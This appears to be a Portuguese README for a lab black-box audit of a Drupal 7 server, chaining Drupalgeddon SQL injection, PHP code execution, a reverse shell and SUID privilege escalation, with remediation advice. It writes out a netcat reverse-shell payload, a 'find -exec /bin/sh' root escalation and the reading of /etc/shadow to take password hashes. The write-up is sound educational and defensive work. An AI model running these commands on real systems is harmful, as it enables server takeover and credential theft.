
Auditoria de segurança Black Box de um servidor Drupal 7. Demonstração de uma Kill Chain completa: Injeção SQL (CVE-2014-3704) ➔ RCE ➔ Reverse Shell ➔ Escalação para Root (SUID). Este repositório contém o relatório técnico detalhado, as provas de exploração (PoC) e as medidas de remediação para proteger a infraestrutura.
Este projeto foi realizado em um ambiente de laboratório controlado e isolado para fins educacionais e acadêmicos. Nenhuma infraestrutura real foi alvo. O objetivo é aprender a proteger sistemas entendendo os mecanismos de ataque.
O objetivo deste projeto é realizar uma auditoria em caixa preta (Black Box). Isso significa que a análise começa sem nenhum conhecimento prévio do alvo: nenhum identificador, documentação técnica ou código fonte foi fornecido.
A infraestrutura foi implantada virtualmente sob VMware em uma rede privada isolada (Host-Only) para evitar qualquer interação com o exterior.
192.168.78.131
192.168.78.132
A primeira etapa consistiu em mapear a superfície de ataque da máquina alvo usando uma varredura de portas.
Comando executado: nmap -sV 192.168.78.132

Serviços identificados:
A análise do serviço web (Porta 80) e do arquivo robots.txt revelou a presença de um CMS Drupal. A inspeção do código fonte permitiu identificar uma versão desatualizada: Drupal 7.x.
Os resultados da fase de reconhecimento evidenciaram uma superfície de ataque crítica: um CMS Drupal 7 não mantido. Esta versão é historicamente conhecida por ser vulnerável a falhas de segurança graves (principalmente "Drupalgeddon").
Diante disso, a auditoria se orientou para uma busca direcionada de vulnerabilidades públicas (CVE). Esta enumeração confirmou a existência de uma cadeia de exploração completa, permitindo passar de um simples visitante web a um administrador de sistema "Root".
Vetores de ataque identificados:
Exploração da falha CVE-2014-3704 (Drupalgeddon). Esta vulnerabilidade na API de banco de dados do Drupal permite injetar comandos SQL sem autenticação.
users com direitos de Administrador.
Uma vez conectado como administrador, uso do módulo nativo PHP Filter. Este módulo, mal configurado, permite executar código PHP arbitrário nas páginas do site.
<?php system('nc -e /bin/bash 192.168.78.131 4444'); ?>www-data).
Análise dos arquivos com permissão SUID (Set User ID). Descoberta de uma configuração crítica no comando find.
find . -exec '/bin/sh' \;find é executado como root, lançando um shell com privilégios Root (uid=0).Uma vez obtido o acesso root, leitura do arquivo sensível /etc/shadow para exfiltrar os hashes das senhas dos usuários.

A auditoria revelou um nível de risco CRÍTICO. A combinação de um CMS desatualizado e uma negligência na configuração do sistema (SUID) permite um comprometimento total do servidor.
Impactos para a empresa:
/etc/shadow).Plano de ação prioritário:
chmod u-s /usr/bin/find).Para o detalhamento técnico completo, os scripts utilizados e a análise aprofundada, consulte o relatório completo: Ler o Relatório de Auditoria (PDF)
Fabien MOINE